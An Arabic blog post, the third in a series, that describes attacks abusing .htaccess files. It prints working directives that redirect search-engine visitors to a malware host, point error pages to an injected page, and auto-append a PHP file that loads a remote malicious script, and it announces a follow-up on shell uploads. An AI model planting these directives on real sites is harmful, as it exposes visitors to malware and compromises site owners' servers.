هجمات ملف htaccess -الجزء الثالث-

بعد أن تعرفنا على ملف htaccess بمقال ما هو ملف htaccess؟ و عن بعض استعمالاته بمقال استعمالات ملف htaccess بهذه التدوينة سنناقش هجمات هذه الملف.

يستعمل الهاكرز ملف htaccess استعمالات عديدة و بعضها خطير للغاية ، حيث يتم إخفاء malware باستعمال هذا الملف، كذلك يتم إعادة توجيه محركات البحث لمواقع خاصة بالهاكرز (هذه الطريقة تستعمل كثيرا في ما يسمى ب blackhat SEO) و استعمالات أخرى عديدة (إخفاء backdoor ، تغيير ملف php أو القيام بحقن كود).

و يعزى استعمال ملف htaccess لسببين رئيسيين ، أولا هذا الملف هو ملف مخفي يمكن ملاحظة هذا من النقطة في بداية إسمه htaccess. و بالتالي فبعض أصحاب المواقع لا يلاحظون وجوده عند استعمال FTP clients .و ثانيا كون الملف قوي جدا و يمكنه إحداث تغييرات عديدة بالويب سيرفر وباحتمالات ضئيلة لاكتشافك كون الهجمات التي تعتمد على هذا الملف صعبة الإكتشاف.

توجيه الزائر القادم من محرك بحث لبرنامج خبيث(Malware):

هجوم من أبسط الهجمات التي يمكن أن نستعمل فيها ملف htaccess بإضافة السطور التالية للملف:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
..
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://spiderhacking.ex/ex.clm?3 [R=301,L]

من خلال السطور يمكن أن تستنتج أن الملف سيقوم بتوجيه كل زوار الموقع الهدف القادمين من محركات البحث (google,ask,yahoo,baidu...) ل malware موجود بالرابط http://spiderhacking.ex/ex.clm?3 الذي أخدناه كمثال ، أما في ما يخص صعوبة اكتشاف هذا الهجوم من طرف صاحب الموقع ، فيتجلى كون صاحب الموقع غالبا ما يستعمل الرابط للدخول و زيارة موقعه في حين أن الهجوم مرتبط بمحركات البحث.

توجيه الزائر من صفحات الأخطاء لبرنامج خبيث (Malware):

ثاني الهجمات يعتمد على استعمال من استعمالات الملف و هي التوجيه لصفحات المشاكل أو Errors ، و هنا يتم تغيير صفحة المشكل إلى صفحة Malware و هذا الهجوم كذلك صعب الإكتشاف ، و السطور التي يتم تغييرها أو إظافتها :

RewriteEngine On
ErrorDocument 400 http://example.com/inject/index.php
ErrorDocument 401 http://example.com/inject/index.php
ErrorDocument 403 http://example.com/inject/index.php
ErrorDocument 404 http://example.com/inject/index.php
ErrorDocument 500 http://example.com/inject/index.php

دمج البرنامج الخبيث داخل الويب سيرفر :

يتم في هذا الهجوم القيام بتغيير خاصية Auto-append-file ليتم تفعيل malware مع كل ملف php ،كمثال للتوضيح :

php_value auto_append_file “/tmp/1.php”

هذا الملف 1.php يتم تفعيله مع كل ملف php ، و هذا الملف يحتوي على كود من هذا القبيل يتم فيه استدعاء برنامج جافا سكريبت خبيث:

<script src="http://example.ex/jquery.js"></script>

أخيرا نأتي لختام هذه التدوينة في انتظار تفاعلكم و تعليقاتكم ، و موضوعي القادم سيكون عن طريقة تجاوز صفحات الأخطاء (خطأ 500) بعد رفع الشيل بالسيرفر.